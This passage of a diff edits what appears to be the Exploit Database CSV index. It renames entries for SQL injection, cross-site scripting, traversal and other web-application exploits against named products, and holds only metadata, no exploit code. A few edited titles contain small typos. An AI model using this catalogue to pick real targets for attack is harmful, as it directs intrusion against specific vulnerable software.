antiboard.php Multiple Parameter SQL Injection",2004-07-28,"Josh Gilmour",php,webapps,0 +24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injections",2004-07-28,"Josh Gilmour",php,webapps,0 24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - antiboard.php feedback Parameter Cross-Site Scripting",2004-07-28,"Josh Gilmour",php,webapps,0 24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0 24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0 @@ -27414,7 +27425,7 @@ id,file,description,date,author,platform,type,port 24425,platforms/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 -24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php L Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php' L' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 @@ -27425,7 +27436,7 @@ id,file,description,date,author,platform,type,port 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,php,webapps,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 -24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php question Parameter' SQL Injection",2013-02-05,kallimero,php,webapps,0 +24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 @@ -27434,7 +27445,7 @@ id,file,description,date,author,platform,type,port 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 @@ -27446,7 +27457,7 @@ id,file,description,date,author,platform,type,port 24483,platforms/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - 'install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 @@ -27457,11 +27468,11 @@ id,file,description,date,author,platform,type,port 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid Parameter' SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0 @@ -27470,11 +27481,11 @@ id,file,description,date,author,platform,type,port 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id Parameter' SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 +24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection",2013-02-21,cr4wl3r,php,webapps,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,cr4wl3r,php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php title Parameter' Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 @@ -27483,7 +27494,7 @@ id,file,description,date,author,platform,type,port 24560,platforms/php/webapps/24560.txt,"doorGets CMS - Cross-Site Request Forgery",2013-03-01,n0pe,php,webapps,0 24561,platforms/php/webapps/24561.txt,"Piwigo 2.4.6 - Multiple Vulnerabilities",2013-03-01,"High-Tech Bridge SA",php,webapps,0 24562,platforms/php/webapps/24562.txt,"PHP-Fusion 7.02.05 - Multiple Vulnerabilities",2013-03-01,waraxe,php,webapps,0 -24563,platforms/hardware/webapps/24563.txt,"D-Link DSL-2740B (ADSL Router) - Authentication Bypass",2013-03-04,"Ivano Binetti",hardware,webapps,0 +24563,platforms/hardware/webapps/24563.txt,"D-Link DSL-2740B ADSL Router - Authentication Bypass",2013-03-04,"Ivano Binetti",hardware,webapps,0 24564,platforms/php/webapps/24564.txt,"Nconf 1.3 - Multiple SQL Injections",2013-03-04,"Saadi Siddiqui",php,webapps,0 24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional - Authentication Bypass",2004-09-02,"Paul Craig",php,webapps,0 24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting",2004-09-02,Exoduks,php,webapps,0 @@ -27502,7 +27513,7 @@ id,file,description,date,author,platform,type,port 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 -24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - APPEND Variable Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 +24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Parameter Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 - down.asp HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps,0 @@ -27542,7 +27553,7 @@ id,file,description,date,author,platform,type,port 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,asp,webapps,0 24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 -24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - adDetail.asp Multiple Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 +24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0 24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0 24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 @@ -27636,7 +27647,7 @@ id,file,description,date,author,platform,type,port 24858,platforms/php/webapps/24858.html,"WordPress Plugin Occasions 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 24859,platforms/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id Parameter' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php' 'list_id' Parameter SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - 'Username'/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 24867,platforms/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 @@ -27652,10 +27663,10 @@ id,file,description,date,author,platform,type,port 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid Parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 -24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php what Parameter' Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php p Parameter' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php' 'p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 @@ -27665,7 +27676,7 @@ id,file,description,date,author,platform,type,port 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,hardware,webapps,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 -24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash Parameter' SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash Parameter SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24969,platforms/php/webapps/24969.txt,"Joomla! Component com_civicrm 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 @@ -27708,7 +27719,7 @@ id,file,description,date,author,platform,type,port 25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25024,platforms/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,hardware,webapps,0 25037,platforms/php/webapps/25037.txt,"Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting",2004-12-18,"James Bercegay",php,webapps,0 -25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injection",2004-12-18,"James Bercegay",php,webapps,0 +25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"James Bercegay",php,webapps,0 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 @@ -27757,7 +27768,7 @@ id,file,description,date,author,platform,type,port 25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 - bibindex.php search Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 -25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 +25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injections",2005-02-17,"Patrick Hof",php,webapps,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 25126,platforms/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 @@ -27901,7 +27912,7 @@ id,file,description,date,author,platform,type,port 25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 - banners.php Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25344,platforms/php/webapps/25344.txt,"phpBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25345,platforms/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 -25346,platforms/asp/webapps/25346.txt,"Active Auction House - default.asp Multiple SQL Injection",2005-04-06,Dcrab,asp,webapps,0 +25346,platforms/asp/webapps/25346.txt,"Active Auction House - 'default.asp' Multiple SQL Injections",2005-04-06,Dcrab,asp,webapps,0 25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.asp SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25348,platforms/asp/webapps/25348.txt,"Active Auction House - start.asp ReturnURL Parameter Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25349,platforms/asp/webapps/25349.txt,"Active Auction House - account.asp ReturnURL Parameter Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 @@ -27909,10 +27920,10 @@ id,file,description,date,author,platform,type,port 25351,platforms/asp/webapps/25351.txt,"Active Auction House - sendpassword.asp Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.asp Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 -25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Variable Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - tellafriend.php product Variable Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - view_cart.php add Variable Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - view_product.php product Variable Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - Module Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 @@ -27950,7 +27961,7 @@ id,file,description,date,author,platform,type,port 25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 - 'index.php' Remote File Inclusion",2005-04-14,"Francisco Alisson",php,webapps,0 25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - search.php Cross-Site Scripting",2005-04-14,y3dips,php,webapps,0 25424,platforms/asp/webapps/25424.txt,"OneWorldStore - 'OWAddItem.asp' SQL Injection",2005-04-14,Dcrab,asp,webapps,0 -25425,platforms/asp/webapps/25425.txt,"OneWorldStore - 'OWListProduct.asp' Multiple SQL Injection",2005-04-14,Dcrab,asp,webapps,0 +25425,platforms/asp/webapps/25425.txt,"OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections",2005-04-14,Dcrab,asp,webapps,0 25426,platforms/asp/webapps/25426.txt,"OneWorldStore - 'OWProductDetail.asp' SQL Injection",2005-04-14,Dcrab,asp,webapps,0 25427,platforms/asp/webapps/25427.txt,"OneWorldStore - 'OWContactUs.asp' Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25428,platforms/asp/webapps/25428.txt,"OneWorldStore - 'OWListProduct.asp' Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 @@ -27965,7 +27976,7 @@ id,file,description,date,author,platform,type,port 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25440,platforms/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php id Parameter' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 @@ -27982,16 +27993,16 @@ id,file,description,date,author,platform,type,port 25473,platforms/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25474,platforms/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25475,platforms/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 -25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - 'default.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 25477,platforms/asp/webapps/25477.txt,"DUportal Pro 3.4 - search.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 - inc_vote.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25479,platforms/asp/webapps/25479.txt,"DUportal Pro 3.4 - result.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25480,platforms/asp/webapps/25480.txt,"DUportal Pro 3.4 - cat.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25481,platforms/asp/webapps/25481.txt,"DUportal Pro 3.4 - detail.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 - 'inc_vote.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25479,platforms/asp/webapps/25479.txt,"DUportal Pro 3.4 - 'result.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25480,platforms/asp/webapps/25480.txt,"DUportal Pro 3.4 - 'cat.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25481,platforms/asp/webapps/25481.txt,"DUportal Pro 3.4 - 'detail.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 25482,platforms/asp/webapps/25482.txt,"DUportal 3.1.2 - channel.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 - inc_poll_voting.asp DAT_PARENT Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 